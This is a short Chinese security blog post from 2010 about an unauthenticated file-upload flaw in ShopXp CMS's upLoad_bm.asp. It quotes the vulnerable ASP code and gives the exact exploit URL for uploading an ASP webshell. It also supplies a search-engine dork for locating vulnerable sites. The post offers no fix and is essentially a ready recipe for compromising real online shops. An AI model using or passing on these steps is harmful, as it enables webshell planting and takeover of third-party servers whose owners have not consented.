ShopXp CMS上传拿Webshell

2010, June 25, 11:10 AM. 漏洞分析
Submitted by admin

作者:lan3a
出处:lan3a.com

首先,必须要知道管理员的目录,因为上传只有后台才可以。
在upLoad_bm.asp文件里,首先没有检查来访者的身份。所以可以直接访问
代码如下:


<%
uppath=request("a")&"/"    '文件上传路径
filelx=request("b")    '文件上传类型   1-jpg  2-jpg&flash  3-htm
formName=request("c")    '回传到上页面编辑框所在Form的Name,为空则不回传,只显示上传后的文件名
EditName=request("d")    '回传到上页面编辑框的Name
if uppath="" or filelx="" then
%>


上传路径我们可以自己定义,上传类型,不填,程序就一个JS提醒一下。照样执行。

利用方法:upLoad_bm.asp?a=uploadfile

比如www.lan3a.com
利用地址为:www.lan3a.com/admin/upLoad_bm.asp?a=uploadfile
直接上传asp木马。

关键字为:inurl:newgoods.asp?action_key_order=news

Tags: shopxp

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopxp html版2.0直接添加管理员漏洞 (浏览: 11049, 评论: 0)
shopxp pinglun.asp 注入漏洞 (浏览: 10919, 评论: 0)
SHOPXP网上购物系统 v8.0 (浏览: 13519, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10406, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):